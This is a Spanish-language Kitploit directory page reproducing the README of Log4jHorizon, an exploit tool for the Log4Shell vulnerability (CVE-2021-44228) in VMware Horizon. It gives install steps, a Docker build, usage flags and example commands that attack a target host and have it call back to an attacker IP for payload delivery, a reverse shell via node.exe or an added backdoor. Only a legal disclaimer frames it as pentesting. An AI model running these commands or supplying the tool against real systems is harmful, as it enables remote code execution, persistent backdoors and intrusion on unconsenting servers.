Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4jHorizon — Explotando CVE-2021-44228 en VMWare Horizon para ejecución remota de código y más. | Kitploit
Herramientas/GitHubGitHub/puzzlepeaches/log4jhorizon
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

Explotando CVE-2021-44228 en VMWare Horizon para ejecución remota de código y más.

Ver Repositorio
12013hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4jHorizon

Explotando CVE-2021-44228 en VMWare Horizon para ejecución remota de código y más.

  • Crossing the Log4j Horizon - A Vulnerability With No Return

El código y el README.md esta vez están un poco dispersos. ¡Próximamente habrá actualizaciones!

¿Por qué?

Las pruebas de concepto para esta vulnerabilidad están dispersas y deben realizarse manualmente. Este repositorio automatiza el proceso de explotación. Consulta la publicación del blog anterior para obtener orientación sobre la post-explotación.

Instalación

Este repositorio se puede utilizar manualmente o con Docker.

Instalación manual

Para descargar y ejecutar el exploit manualmente, ejecuta los siguientes pasos. Primero, asegúrate de que Java y Maven estén instalados en tu host atacante. Para hacerlo usando apt en sistemas operativos basados en Debian, ejecuta el siguiente comando:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Clona el repositorio de GitHub e instala todos los requisitos de Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Desde la raíz del repositorio Log4jHorizon, compila el proyecto Rogue-Jndi usando el siguiente comando:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Instalación con Docker

Primero, asegúrate de que Docker esté instalado en tu host atacante. (No te voy a guiar paso a paso en esto)

Después de eso, ejecuta el siguiente comando para clonar el repositorio y construir la imagen de Docker que usaremos.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

Para ejecutar el contenedor, ejecuta un comando similar al siguiente con tus banderas de línea de comandos añadidas. Ten en cuenta que el contenedor no capturará una reverse shell. Necesitas crear un listener de ncat en una sesión de shell separada:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

Uso

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

Ejemplos

Obtén una reverse shell usando la herramienta instalada en tu sistema local:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

Aviso legal

Esta herramienta está diseñada para su uso durante pruebas de penetración; el uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por cualquier uso indebido de este programa.

Descargar herramienta